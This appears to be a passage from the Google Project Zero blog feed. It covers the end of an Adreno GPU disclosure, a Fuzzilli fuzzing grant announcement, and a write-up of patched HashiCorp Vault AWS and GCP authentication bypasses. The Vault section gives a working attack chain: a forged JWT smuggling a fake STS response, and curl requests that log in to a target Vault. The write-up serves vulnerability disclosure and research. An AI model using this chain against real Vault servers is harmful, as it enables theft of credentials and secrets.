Project Zero reiterates that a fix needs to be expected within the 14-day window for that extension option to apply.

2020-08-25

Qualcomm asks whether any OEM shipping a fix within the 14-day window would be sufficient for the grace extension to be applied.

2020-08-26

Project Zero responds with a range of options for how to use the 14-day extension in cases of a complex downstream arrangement. Project Zero requests the CVE-ID for this issue.

2020-08-27

Qualcomm informs Project Zero that the CVE-ID will be CVE-2020-11179.

2020-09-02

Qualcomm provides a statement for inclusion in the blog post, and asks to confirm the disclosure date, as the 90-day period ends on a US Public Holiday (Sep 7).

2020-09-02

Project Zero confirms that the new disclosure date is Sep 8, due to the US Public Holiday.

2020-09-08

Public disclosure (issue tracker and blog post)


Recommendations


We can offer a few additional recommendations:


  1. Transparency and openness: One of the surprising observations while performing this attack was the level of complexity and the amount of processing of untrusted data that happens on the GPU. Since the GPU is a critical part of Android's security model, increasing the level of openness to be consistent with other similarly critical components is advisable. Note that this guidance applies to both Qualcomm Adreno and ARM Mali. Practically speaking, this could include publishing any relevant design documentation and source code, while also providing a threat model/security model for the GPU device.

    More generally, the competitive benefits of a closed platform approach to hardware internals should be reassessed in 2020. This balance may have been historically appropriate when the GPU was not in the critical path for security, but today billions of users are relying on the GPU to uphold the operating system security model. 


  2. Variant analysis: It's possible that this issue could have been found and fixed earlier, based on the first report of CVE-2019-10567. The initially adopted fixes by the Adreno engineers were a clever attempt at mitigating the issue, but didn't look particularly reliable or comprehensive at first glance.

    Between Qualcomm, Android security, and the numerous OEMs that received details of both the original attack and the planned patches, I find it troubling that no one seems to have questioned the efficacy of these patches any further. Personally, I think this is because the work of the teams that triage and respond to external vulnerability reports is often undervalued and underfunded.

    When facing a barrage of external bug reports, it's hard enough to keep your head above water, let alone find the time and mental energy to pursue and understand an individual issue to the level required to find variants. But a high quality bug report is a potential gold mine of insights and ideas for improving your products' defensive posture.

    Speaking to security engineering managers now: finding ways to resource and structure your vulnerability triage team in a way that allows for individual deep dives and tangential pursuits is the best way to extract the maximum value from your external bug reports, and will certainly pay for itself in the long run (in terms of your product's security posture of course, but also in terms of your team's reputation, motivation, and ability to hire). This type of triage work is often seen as a stepping stone to something better, or as a dreaded busy-work rotation, but it doesn't need to be like that.


  3. Vulnerability Remediation: All security critical components in Android devices should be updateable within 90 days, including low-level systems like GPU firmware. For components where this is not yet the case, we disclose issues like this hoping to motivate future investments in technology, staffing, and process improvements that will bring the component in line with industry standards.

    There's a temptation to say that "hardware issues" are harder to fix, and so should receive more lenient treatment. However, this bug is best described as a software issue running on an opaque and undocumented platform. This relative obscurity has likely contributed to a lack of review, hardening, testing, and a slower vulnerability remediation process, but these challenges aren't fundamental to the technology itself. With proper investment, bugs like this can be fixed and shipped to users within 90 days. If for any reason that investment isn't possible, it's important that users are made aware of this constraint.


Conclusion


This blog post describes a unique and unusually powerful security issue affecting Qualcomm's Adreno GPU. We outlined the design of the GPU and kernel driver, and some side effects of that design that result in a shared memory attack on the GPU itself. This led to a relatively stable race condition that bypassed the GPU protected mode and gave attacker controlled GPU commands access to arbitrary physical memory. Ultimately this could be used to build an Android sandbox escape exploit that gives kernel code execution. Finally, we discussed the planned fix, the fix timeline, and gave some additional recommendations for areas of future improvement.


Thank you to Guang Gong for first reporting this fascinating style of attack, and to Qualcomm for a very prompt, open, and professional response to my additional research.

✇Google Project Zero

Announcing the Fuzzilli Research Grant Program


Posted by Samuel Groß, Project Zero


Project Zero’s mission is to make 0-day hard in order to improve end-user security. We attack this problem in different ways, including supporting other security researchers. While Google currently offers research grants, they are limited to academics and those affiliated with universities. 


Today we are announcing a new USD $50,000 pilot program to foster research into JavaScript engine fuzzing through Google Compute Engine (GCE) credit grants. Here is how it works:


  1. Interested researchers submit a proposal for a project about fuzzing JavaScript engines.

  2. The proposal will be reviewed by an internal review board and, if accepted, the researchers will be awarded up to USD $5,000 in GCE credits per submission to be used for fuzzing.

  3. All bugs found throughout the course of the project must be reported directly to the affected vendors. Researchers can claim full CVE credits and applicable bug bounties.

Overview

The program is designed to promote research into new approaches for JavaScript engine fuzzing. Examples of research areas that we are especially interested in include:

  • Custom, domain-specific sanitizers such as WebKit’s doesGC validation or bounds check elimination verification, which can help detect bugs that would otherwise go unnoticed as they don’t immediately cause observable failures

  • New, possibly domain-specific feedback metrics to guide JavaScript/JIT engine fuzzers

  • Different high-level fuzzing approaches such as differential fuzzing

  • New code mutation or generation approaches that outperform existing ones

  • Targeted approaches to fuzz for variants of previously reported bugs


Applications can be submitted by filling out this form. Submissions are not limited to those in academia or those with a demonstrated track record of success - if you have a good idea in this space, we'd love to hear from you. Incoming submissions will be reviewed by a review board on a regular basis and we aim to respond to every submission within 2 weeks. If the project is accepted, the researchers may be awarded GCE credits worth up to USD $5,000. Researchers can also apply for multiple grants throughout the lifetime of a project. The grants come with the following requirements:

  • The credits must be used for fuzzing JavaScript engines with the approach described in the proposal. The fuzzed JavaScript engines should be one or more of the following: JavaScriptCore (Safari), v8 (Chrome, Edge), or Spidermonkey (Firefox).

  • All vulnerabilities found must only be reported to the affected vendor. Researchers are encouraged to apply Project Zero’s 90-day disclosure policy. Researchers may claim any CVE credits and bug bounty payouts for reporting the bugs, as long as doing so doesn’t conflict with these requirements.

  • Any newly developed source code must be published under an open source license that permits further research by others. 

  • An interim report for Google only at the conclusion of the fuzzing, to demonstrate the initial results of the research, so we can determine the efficacy of the research and make our folks in accounting happy.

  • Furthermore, a final report of some form (e.g. a conference paper, a blog post, or a standalone PDF) due no later than 6 months after the first grant for a project has been awarded, including:

    • A detailed explanation of the project

    • Basic statistics about which engines have been fuzzed for how long (CPU time, iterations, etc.)

    • A clear technical explanation of all vulnerabilities discovered throughout the project.


Researchers are encouraged to base their project on the open source Fuzzilli fuzzer if possible, which, amongst other features, already supports distributed fuzzing on GCE.

Timeline

The pilot program will run for one year, from Oct 1, 2020 until Oct 1, 2021. Applications can be submitted at any time during this period, however, the program might end earlier if funds are exhausted.

Motivation

JavaScript engine security continues to be critical for user safety, as demonstrated by recent in-the-wild 0day exploits abusing vulnerabilities in v8, the JavaScript engine behind Chrome. Unfortunately, fuzzing JavaScript engines to uncover these vulnerabilities is generally quite expensive due to their high complexity and relatively slow processing of input. As a rough datapoint, the GCE instances used to find the ~20 bugs with Fuzzilli in 2019 cost around USD $10,000. Income from bug bounty programs is uncertain, as there is no guarantee a new approach will also discover new bugs. Moreover, as any bounty money is paid out only later, researchers need to bear the costs of fuzzing in advance. This likely results in bugs staying unfixed and thus exploitable for longer. This program aims to help solve this problem.


Scope of Pilot

This program is similar to Google Cloud research credits, though that program is limited to university affiliates. In contrast, this program is specifically designed to accept submissions from anyone.


This program is also similar to the Chrome Fuzzer Program. However, the Chrome Fuzzer Program is limited to LibFuzzer-based fuzzers or blackbox fuzzers, neither of which can currently support a fuzzer like Fuzzilli due to technical limitations. In addition, it is also not currently possible to experiment with custom engine “sanitizers” that detect bugs before they result in otherwise observable misbehaviour. Overall, this program allows researchers greater flexibility around their fuzzing approach but limits the scope to JavaScript engine fuzzing.

Legal points

We are unable to issue grants to individuals who are on sanctions lists, or who are in countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions lists. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law.


This is not a competition, but rather an experimental and discretionary grant program. You should understand that we can cancel the program at any time and the decision as to whether or not to award a grant is entirely at our discretion.


Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own.


✇Google Project Zero

Enter the Vault: Authentication Issues in HashiCorp Vault


 Posted by Felix Wilhelm, Project Zero

Introduction

In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integration with Amazon Web Services (AWS) and Google Cloud Platform (GCP). These issues can lead to an authentication bypass in configurations that use the aws and gcp auth methods, and demonstrate the type of issues you can find in modern “cloud-native” software. Both vulnerabilities (CVE-2020-16250/16251) were addressed by HashiCorp and are fixed in Vault versions 1.2.5, 1.3.8, 1.4.4 and 1.5.1 released in August.


Vault is a widely used tool for securely storing, generating and accessing secrets such as API keys, passwords or certificates. It can be used as a shared password manager for human users, but its feature set is optimized for API based access by other services. An example use case for Vault is to provide one of your services, such as your webserver, short lived credentials to your database or a third-party resource like an AWS S3 bucket.


Using a central secret storage like Vault offers security benefits such as centralized auditing, enforced credentials rotation or encrypted data storage. However, a central storage is also a very interesting target for an attacker. Exploiting a vulnerability in Vault could give an attacker full access to a wide range of important secrets and large parts of the target's infrastructure.


Before diving into the technical details of the vulnerabilities, the next section gives an overview about Vault’s authentication architecture and the way it integrates with cloud providers. Readers familiar with Vault can feel free to skip this section.

Authenticating to Vault

Interfacing with Vault requires authentication and Vault supports role-based access control to govern access to stored secrets. For authentication, it supports pluggable auth methods ranging from static credentials, LDAP or Radius, to full integration into third-party OpenID Connect (OIDC) providers or Cloud Identity Access Management (IAM) platforms. For infrastructure that runs on a supported cloud provider, using the provider's IAM platform for authentication is a logical choice.


Take AWS as an example: Almost every workload you can run in AWS executes in the context of a specific AWS IAM user. By enabling and configuring the aws auth method, you can create a mapping from certain IAM users or roles to Vault roles.


Imagine that you have an AWS Lambda function and want to give it access to a database password stored in Vault. Instead of storing hard coded credentials in the function code, a Vault administrator can assign a vault role to the Lambda function execution role using the vault CLI:


vault write auth/aws/role/dbclient auth_type=iam \

              bound_iam_principal_arn=arn:aws:iam::123456789012:role/lambda-role policies=prod,dev max_ttl=10m


This will create a mapping between a vault role named dbclient and the AWS IAM role lambda-role. A vault policy can now be used to grant the dbclient role access to the database secret.


When the lambda function executes, it authenticates to Vault by sending a request to the /v1/auth/aws/login API endpoint. I’ll go into the exact layout of this request later in the post, but for now just assume that the request allows Vault to verify the AWS IAM role of the caller. If authentication succeeds, Vault returns a short-lived API token for the dbclient role back to the lambda function. This token can now be used to fetch the database secret from Vault. Depending on the database backend, this secret could be a static user-password combination, a short lived client certificate or even a dynamically created credential pair.
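
As a rough illustration of this client-side flow, here is a minimal sketch using the official github.com/hashicorp/vault/api Go client. The secret path and the iam_request_* values are placeholders (in practice the signed request is generated as described in the next sections), so treat this as an outline rather than a working login:

package main

import (
    "fmt"
    "log"

    vault "github.com/hashicorp/vault/api"
)

func main() {
    // VAULT_ADDR and other settings are read from the environment.
    client, err := vault.NewClient(vault.DefaultConfig())
    if err != nil {
        log.Fatal(err)
    }

    // Log in against the aws auth method. The iam_request_* fields carry a
    // serialized, pre-signed sts:GetCallerIdentity request; placeholder values here.
    secret, err := client.Logical().Write("auth/aws/login", map[string]interface{}{
        "role":                     "dbclient",
        "iam_http_request_method":  "POST",
        "iam_request_url":          "base64-encoded-url",
        "iam_request_body":         "base64-encoded-body",
        "iam_request_headers":      "base64-encoded-headers",
    })
    if err != nil {
        log.Fatal(err)
    }

    // Use the short-lived token from the login response to fetch the database secret.
    client.SetToken(secret.Auth.ClientToken)
    dbSecret, err := client.Logical().Read("database/creds/dbclient") // placeholder path
    if err != nil {
        log.Fatal(err)
    }
    fmt.Println(dbSecret.Data)
}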


Using Vault in this way has some nice security benefits: The lambda function itself does not need to contain bootstrap credentials and every access to the database credentials is auditable. Rotating old or compromised database credentials is straightforward and can be centrally enforced.


However, this operational simplicity is only possible because of hidden complexity in the AWS iam auth method. How does the /v1/auth/aws/login API endpoint actually work and is there a way an unauthenticated attacker can impersonate a random AWS IAM role? Let’s take a look.

sts:GetCallerIdentity

Vault’s aws auth method supports two different authentication mechanisms internally: iam and ec2. We are interested in the iam mechanism, which is the recommended variant and also used in our previous Lambda example. iam auth is built on top of an AWS API method called GetCallerIdentity, part of the AWS Security Token Service (STS).


As its name implies, GetCallerIdentity returns details about the IAM role or user whose credentials were used to call the API. To understand how Vault uses this method to authenticate clients we need to understand how AWS APIs perform authentication:


Instead of attaching some form of authentication token or credential to API requests, AWS requires clients to calculate an HMAC signature for the (canonicalized) request using the caller's secret access key and attach this signature to the request. This mechanism makes it possible to pre-sign a request and forward it to another party to allow a limited form of impersonation. A popular example use case is to give clients the ability to upload a file to S3 without giving them access to credentials with write permissions.
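
To make the pre-signing idea concrete, here is a rough sketch (my own illustration, not Vault code) of how a client could produce a pre-signed GetCallerIdentity request using the aws-sdk-go-v2 SigV4 signer. The signature lands in the request headers, so the whole request can be handed to a third party, which can replay it against STS without ever seeing the caller's secret key:

package main

import (
    "context"
    "crypto/sha256"
    "encoding/hex"
    "fmt"
    "log"
    "net/http"
    "strings"
    "time"

    v4 "github.com/aws/aws-sdk-go-v2/aws/signer/v4"
    "github.com/aws/aws-sdk-go-v2/config"
)

func main() {
    ctx := context.Background()

    // Load the caller's AWS credentials (environment, shared config, instance role, ...).
    cfg, err := config.LoadDefaultConfig(ctx)
    if err != nil {
        log.Fatal(err)
    }
    creds, err := cfg.Credentials.Retrieve(ctx)
    if err != nil {
        log.Fatal(err)
    }

    // Build a plain sts:GetCallerIdentity request...
    body := "Action=GetCallerIdentity&Version=2011-06-15"
    req, _ := http.NewRequest("POST", "https://sts.amazonaws.com/", strings.NewReader(body))
    req.Header.Set("Content-Type", "application/x-www-form-urlencoded; charset=utf-8")

    // ...and sign it. The HMAC signature ends up in the Authorization header and
    // covers the canonicalized request, but the secret key itself is never included.
    payloadHash := sha256.Sum256([]byte(body))
    signer := v4.NewSigner()
    if err := signer.SignHTTP(ctx, creds, req, hex.EncodeToString(payloadHash[:]),
        "sts", "us-east-1", time.Now()); err != nil {
        log.Fatal(err)
    }

    fmt.Println(req.Method, req.URL, req.Header.Get("Authorization"))
}

A signed request like this (method, URL, headers and body) is essentially what a Vault client serializes and forwards to the login endpoint, as described next.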


The Vault aws authentication mechanism is a simple variant of this technique. 

The client pre-signs an HTTP request to the STS GetCallerIdentity method and sends a serialized version of it to the Vault server. The Vault server sends the pre-signed requests to the STS host and extracts the AWS IAM information out of the result. The server-side part of this flow is implemented in pathLoginUpdate in builtin/credential/aws/path_login.go:


func (b *backend) pathLoginUpdateIam(ctx context.Context, req *logical.Request, data *framework.FieldData) (*logical.Response, error) {

    method := data.Get("iam_http_request_method").(string)

    ...

    // In the future, might consider supporting GET

    if method != "POST" {

            return logical.ErrorResponse(...), nil

    }


    rawUrlB64 := data.Get("iam_request_url").(string)

    ...

    rawUrl, err := base64.StdEncoding.DecodeString(rawUrlB64)

    ...

    parsedUrl, err := url.Parse(string(rawUrl))

    if err != nil {

            return logical.ErrorResponse(...), nil

    }


    bodyB64 := data.Get("iam_request_body").(string)

    ...

    bodyRaw, err := base64.StdEncoding.DecodeString(bodyB64)

    ...        

    body := string(bodyRaw)


    headers := data.Get("iam_request_headers").(http.Header)

    

    endpoint := "https://sts.amazonaws.com"


    ...


    callerID, err := submitCallerIdentityRequest(ctx, maxRetries, method, endpoint, parsedUrl, body, headers)



The function extracts the HTTP method, URL, body and headers out of the supplied request body, which is stored in data. It then calls submitCallerIdentityRequest to forward the request to the STS server and to fetch and parse the result in parseGetCallerIdentityResponse:


func submitCallerIdentityRequest(ctx context.Context, maxRetries int, method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) (*GetCallerIdentityResult, error) {

    ...

    request := buildHttpRequest(method, endpoint, parsedUrl, body, headers)

    retryableReq, err := retryablehttp.FromRequest(request)

    ...

    response, err := retryingClient.Do(retryableReq)

    responseBody, err := ioutil.ReadAll(response.Body)

    ...

    if response.StatusCode != 200 {

            return nil, fmt.Errorf(..)

    }

    callerIdentityResponse, err := parseGetCallerIdentityResponse(string(responseBody))

    if err != nil {

            return nil, fmt.Errorf("error parsing STS response")

    }

    return &callerIdentityResponse.GetCallerIdentityResult[0], nil

}

 

func buildHttpRequest(method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) *http.Request {

    ...

    targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI()) 

    request, err := http.NewRequest(method, targetUrl, strings.NewReader(body))

    ...

    request.Host = parsedUrl.Host

    for k, vals := range headers {

            for _, val := range vals {

                    request.Header.Add(k, val)

            }

    }

    return request

}


buildHttpRequest creates a http.Request object based on the user supplied parameters, but uses the hardcoded constant https://sts.amazonaws.com to build the target URL. 

Without this restriction, we could simply trigger a request to a server under our control and return a fake caller identity.


However, the complete lack of validation for URL path, query, POST body and HTTP headers still looks like a promising attack surface. The next section describes how we can turn this gap into a full authentication bypass.

STS (Caller) Identity Theft 

Our goal is to trick Vault’s submitCallerIdentityRequest function into returning an attacker controlled caller identity. One way to achieve this is to manipulate the Vault server into sending a request to a host we control, bypassing the hardcoded endpoint host. Looking at the buildHttpRequest method, two approaches come to mind:

  • The code for calculating targetUrl (targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI())) doesn't look very robust against URL parsing issues. However, tricks like embedding a fake userinfo (https://sts.amazonaws.com/:[email protected]/test) and similar ideas do not work against the robust Go URL parser.

  • Even though Vault will always create a HTTPS request pointing at the hardcoded endpoint, the attacker has full control over the Host http header (request.Host = parsedUrl.Host). This could be a problem if a load balancer in front of the STS API makes routing decisions based on the Host header, but blind testing against the STS host did not lead to any success.


After ruling out the easy way forward, we still have another approach available: Vault does not restrict our URL query parameters. This means we are not limited to pre-signing requests to GetCallerIdentity and can create requests to any action of the STS API. STS supports 8 different actions, but none gives us the ability to completely control the response. At this point I was slowly getting frustrated and decided to take a look at Vault’s response parsing code:


func parseGetCallerIdentityResponse(response string) (GetCallerIdentityResponse, error) {

        decoder := xml.NewDecoder(strings.NewReader(response))

        result := GetCallerIdentityResponse{}

        err := decoder.Decode(&result)

        return result, err

}


type GetCallerIdentityResponse struct {

 XMLName                 xml.Name                 `xml:"GetCallerIdentityResponse"`

 GetCallerIdentityResult []GetCallerIdentityResult `xml:"GetCallerIdentityResult"`

 ResponseMetadata        []ResponseMetadata        `xml:"ResponseMetadata"`

}



parseGetCallerIdentityResponse is called on every response received from STS as long as the status code is 200. The function uses the Golang standard XML library to decode an XML response into a GetCallerIdentityResponse structure and returns an error if decoding fails. 


There is an easy-to-miss problem with this code: Vault never enforces or verifies that the STS response is actually XML encoded. While STS responses are XML encoded by default, STS also supports JSON encoding for clients that send an Accept: application/json HTTP header.


For Vault, this turns into a security issue due to a somewhat surprising feature of the Go XML decoder: The decoder silently ignores non-XML content before and after the expected XML root. This means that calling parseGetCallerIdentityResponse with a (JSON encoded) server response such as ‘{“abc” : “xzy<GetCallerIdentityResponse></GetCallerIdentityResponse>”}’ will succeed and return an (empty) CallerIdentityResponse structure.
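
This behaviour is easy to reproduce in isolation. The following standalone sketch (mirroring the response structures above) shows the decoder happily pulling the embedded XML element out of an otherwise JSON-shaped string:

package main

import (
    "encoding/xml"
    "fmt"
    "strings"
)

type GetCallerIdentityResult struct {
    Arn    string `xml:"Arn"`
    UserId string `xml:"UserId"`
}

type GetCallerIdentityResponse struct {
    XMLName                 xml.Name                  `xml:"GetCallerIdentityResponse"`
    GetCallerIdentityResult []GetCallerIdentityResult `xml:"GetCallerIdentityResult"`
}

func main() {
    // A JSON response that merely *contains* an XML fragment inside a string value.
    payload := `{"abc": "xyz<GetCallerIdentityResponse><GetCallerIdentityResult>` +
        `<Arn>arn:aws:iam::attacker</Arn><UserId>XYZ</UserId>` +
        `</GetCallerIdentityResult></GetCallerIdentityResponse>"}`

    // The decoder skips the leading character data, decodes the first matching
    // element it finds, and never looks at the trailing bytes.
    var result GetCallerIdentityResponse
    if err := xml.NewDecoder(strings.NewReader(payload)).Decode(&result); err != nil {
        panic(err)
    }
    fmt.Println(result.GetCallerIdentityResult[0].Arn) // prints: arn:aws:iam::attacker
}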


This brings us really close to our goal of spoofing an arbitrary caller identity: we just need to find an STS action that reflects attacker-controlled text as part of its API response, serialize a request to it while including an Accept: application/json header, and put an arbitrary GetCallerIdentityResponse XML blob into the reflected payload.


Finding a reflected parameter that is not constrained to alpha-numeric characters turns out to be tricky. After some trial and error, I decided to target the AssumeRoleWithWebIdentity action and its SubjectFromWebIdentityToken response element. AssumeRoleWithWebIdentity is used to translate JSON Web Tokens (JWT) signed by an OpenID Connect (OIDC) provider into AWS IAM identities.

Sending a request to this action with a valid signed JWT will return the sub field of the token in the SubjectFromWebIdentityToken field.


Of course, a normal OIDC provider won’t sign a JWT with an XML payload in the subject field. Still, an attacker can just create their own OIDC Identity Provider (IdP), register it on an AWS account they own and sign arbitrary tokens with their own keys.


Let's put all of this together and walk through the full attack step-by-step.


  1. Create a minimal OIDC IdP. This boils down to generating an RSA key pair, creating an OIDC discovery.json and key.json document, and hosting the JSON files on a web server (see here for an example setup using S3).

  2. Use your own AWS account to register an OIDC IdP -> AWS IAM role mapping. It is important to note that the AWS account used for this does not need to have any relationship with our target.

  3. We can now use our OIDC IdP to sign a JWT that contains an arbitrary GetCallerIdentityResponse as part of its subject claim. A decoded example token could look like this: iss, azp and aud match the details specified in step 2. sub contains our spoofed response, identifying us as the AWS IAM account arn:aws:iam::superprivileged-aws-account


{'iss': 'https://oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/',

 'azp': 'abcdef', 'aud': 'abcdef', 

 'sub': '<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>',

 'exp': 1595120834, 'iat': 1594207895}


  4. We can test if everything is set up correctly by sending a direct request to the STS AssumeRoleWithWebIdentity action using the (signed) token from step 3 and the RoleArn used in step 2:


curl -H "Accept: application/json"

'https://sts.amazonaws.com/?DurationSeconds=900&Action=AssumeRoleWithWebIdentity&Version=2011-06-15&RoleSessionName=web-identity-federation&RoleArn=arn:aws:iam::XZY::YOUR-OIDC-ROLE&WebIdentityToken=YOURTOKEN'


If everything goes as planned STS will reflect the token subject as part of its JSON encoded response. As discussed above, the Go XML decoder will skip all of the content before and after the GetCallerIdentityResponse object leading Vault to consider this a valid STS CallerIdentity response.


{"AssumeRoleWithWebIdentityResponse":{"AssumeRoleWithWebIdentityResult":

{"AssumedRoleUser":{"Arn":"arn:aws:iam::XZY::YOUR-OIDC-ROLE/web-identity-federation","AssumedRoleId":"AROATQ4R7PP5JJNLOF5P6:web-identity-federation"},

"Audience":"abcdef","Credentials":{...},"PackedPolicySize":null,"Provider":"arn:aws:iam::242434931706:oidc-provider/oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/",

"SubjectFromWebIdentityToken":"<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>"},

"ResponseMetadata":....}


  5. The final step is to convert this request into the form expected by Vault (e.g. base64 encoding all required headers, the url and an empty post body) and to send it to the target Vault server as a login request on /v1/auth/aws/login. Vault will deserialize the request, send it to STS and misinterpret the response. If the AWS ARN/UserID in our fake GetCallerIdentityResponse has privileges on the Vault server, we get a valid session token back, which we can use to interact with the Vault server to fetch some secrets. (A rough sketch of this serialization step follows the example response below.)


curl -X POST "https://vault-server/v1/auth/aws/login" -d '{"role":"dev-role-iam",

"iam_http_request_method": "POST", "iam_request_body": "encoded-body", , "iam_request_headers" :

"encoded-headers", "iam_request_url" : "encoded-url"}'


{"request_id":"59b09a0b-f5d5-f4c4-8ed0-af86a2c1f5d4","lease_id":"","renewable":false,"lease_duration":0,"data":null,"wrap_info":null,"warnings":["TTL

of \"768h\" exceeded the effective max_ttl of \"500h\"; TTL value is capped

accordingly"],"auth":{"client_token":"s.Kx3bUNw6wEc5bbkrKBiGW6WL","accessor":"TBRh0hvfd4FkYEAyFrUE3i2P","policies":["default","dev","prod"],"token_policies":["default","dev","prod"],

"metadata":{"account_id":"242434931706","auth_type":"iam","role_id":"47faaf36-c8ab-c589-396c-2643c26e7b30"},

"lease_duration":1800000,"renewable":true,"entity_id":"447e1efe-0fd4-aa10-3a54-52405c0c69ab","token_type":"service","orphan":true}}


I wrote a proof-of-concept exploit that takes care of most of the busy work around JWT creation and serialization. While the OIDC provider setup adds some complexity, we end up with a nice authentication bypass for arbitrary AWS-enabled roles. The only requirement is that the attacker knows the name of a privileged AWS role in the target Vault server.


What went wrong here? Looking at it from an attacker perspective, the whole authentication mechanism seems clever but error-prone. Putting HTTP request forwarding into the unauthenticated external attack surface of a security product requires strong confidence in the implementation and the underlying HTTP libraries. This becomes even more difficult as the security depends on implementation details of the Security Token Service, which might change at any point in the future. For example, AWS might decide to put STS behind a load balancing frontend, which uses the Host header for routing decisions. Without any change to the Vault codebase, this could severely degrade the security of this authentication mechanism from one moment to another. 


Of course, there is a reason why the authentication works as described: AWS IAM doesn’t have a straightforward way of proving a service’s identity to other non-AWS services. Third-party services can’t easily verify pre-signed requests and AWS IAM doesn’t offer any standard signing primitives that could be used to implement certificate based authentication or JWTs.

In the end, HashiCorp fixed the vulnerability by enforcing an allowlist of HTTP headers, restricting requests to the GetCallerIdentity action, and applying stronger validation of the STS response, which is hopefully enough to protect against unexpected changes to the STS implementation or HTTP parser differences between STS and Golang.


After finding this issue in the AWS authentication module, I decided to review its GCP equivalent. The next section describes how GCP authentication for Vault is implemented and how a simple logic flaw can lead to an authentication bypass in many configurations.

Exploiting Vault-on-GCP

Vault supports the gcp auth method for deployments on Google Cloud. Similar to its AWS counterpart, the auth method supports two different authentication mechanisms: iam and gce. Whereas the iam mechanism supports arbitrary service accounts and can be used from services such as App Engine or Cloud Functions, gce can only be used to authenticate virtual machines running on Google Compute Engine. Still, it has some interesting advantages. Instead of only making authentication decisions based on a service account identity, gce can also grant access based on a number of VM attributes. For example, a configuration could give only VMs in a specific region (europe-west-6) access to certain secrets, allow all VMs in the xyz-prod GCP project access or restrict it even further using instance-groups.


Both iam and gce are built on top of JWT. A vault client that wants to authenticate creates a signed token to prove its identity and sends it to the vault server to get a session token back. For the iam mechanism, the client signs the token directly using a service account private key under their control or with the projects.serviceAccounts.signJwt IAM API method.


For gce, the client is expected to run on an authorized GCE VM. It fetches a signed token by sending a request to the instance identity endpoint of the GCP metadata server. In contrast to service account tokens, this token is signed by an official Google certificate. In addition to the normal JWT claims (sub, aud, iat, exp), the tokens returned from the metadata server also contain a special compute_engine claim that lists details about the instance, which are processed as part of the auth process:


"google":{"compute_engine":{"instance_creation_timestamp":1594641932,"instance_id":"671398237781058X

XXX","instance_name":"vault","project_id":"fwilhelm-testing-XXXX","project_number":950612XXXX,"zone":"europe-west3-c"}}


JWT has a number of design choices that make it very prone to implementation errors (see this blog post by securitum for an overview about typical issues), so I decided to spend a day on reviewing Vault’s token processing.


The function parseAndValidateJwt is responsible for processing both gce and iam tokens.

It first parses the token without verifying the signature and passes the decoded token into the getSigningKey helper method:


// Process JWT string.

signedJwt, ok := data.GetOk("jwt")

if !ok {

        return nil, errors.New("jwt argument is required")

}


// Parse 'kid' key id from headers.

jwtVal, err := jwt.ParseSigned(signedJwt.(string))

if err != nil {

        return nil, errwrap.Wrapf("unable to parse signed JWT: {{err}}", err)

}


key, err := b.getSigningKey(ctx, jwtVal, signedJwt.(string), loginInfo.Role, req.Storage) 

if err != nil {

        return nil, errwrap.Wrapf("unable to get public key for signed JWT: %v", err)

}


getSigningKey extracts the key id claim (kid) out of the token header and tries to find a google-wide oAuth key with the same identifier. This will work for GCE metadata tokens, but not for tokens signed by a service account:


func (b *GcpAuthBackend) getSigningKey(...) (interface{}, error) {

b.Logger().Debug("Getting signing Key for JWT")


if len(token.Headers) != 1 {

        return nil, errors.New("expected token to have exactly one header")

}

kid := token.Headers[0].KeyID

b.Logger().Debug("kid found for JWT", "kid", kid)


// Try getting Google-wide key

k, gErr := gcputil.OAuth2RSAPublicKey(ctx, kid)

if gErr == nil {

        b.Logger().Debug("Found Google OAuth2 provider key", "kid", kid)

        return k, nil

}



If this approach fails, the Vault server extracts the Subject (sub) claim from the supplied token. For valid tokens, this claim contains the email address of the signing service account. Knowing the key id and subject of the token, Vault fetches the public key used for signing using the service account GCP API:


// If that failed, try to get account-specific key

b.Logger().Debug("Unable to get Google-wide OAuth2 Key, trying service-account public key")

saId, err := getJWTSubject(rawToken)

if err != nil {

        return nil, err

}

k, saErr := gcputil.ServiceAccountPublicKey(saId, kid)

if saErr != nil {

        return nil, errwrap.Wrapf(fmt.Sprintf("unable to get public key %q for JWT subject %q: {{err}}", kid, saId), saErr)

}


return k, nil


In both cases, the Vault server now has access to a public key that can verify the signature of the JWT:


// Parse claims and verify signature.

baseClaims := &jwt.Claims{}

customClaims := &gcputil.CustomJWTClaims{}


if err = jwtVal.Claims(key, baseClaims, customClaims); err != nil {

        return nil, err

}


if err = validateBaseJWTClaims(baseClaims, loginInfo.RoleName); err != nil {

        return nil, err

}


If verification succeeds, Vault fills out the loginInfo struct that is later used to grant or deny access. If the token contains a compute_engine claim, it is copied into the loginInfo.GceMetadata field:


loginInfo.JWTClaims = baseClaims


if len(baseClaims.Subject) == 0 {

        return nil, errors.New("expected JWT to have non-empty 'sub' claim")

}

loginInfo.EmailOrId = baseClaims.Subject


if customClaims.Google != nil && customClaims.Google.Compute != nil &&  len(customClaims.Google.Compute.InstanceId) > 0 {

        loginInfo.GceMetadata = customClaims.Google.Compute

}


if loginInfo.Role.RoleType == gceRoleType && loginInfo.GceMetadata == nil {

        return nil, errors.New("expected JWT to have claims with GCE metadata")

}


return loginInfo, nil


As mentioned above, all of this code is shared between the iam and gce auth methods. The issue here is that no check enforces that a token signed by an arbitrary service account doesn’t contain GCE compute_engine claims. While the content in a GCE metadata token is trustworthy and controlled by Google, service account tokens are completely controlled by the owner of the service account and can therefore contain arbitrary claims.


If we follow the control flow of the gce method to the end we can see that Vault uses loginInfo.GceMetadata as part of its auth decision in pathGceLogin if two conditions are met:

  • The VM described in the metadata section needs to exist. This is verified using the GCE API and requires an attacker to impersonate an actively running VM. In practice, only project_id, zone and instance_name are verified and need to be set to valid values.

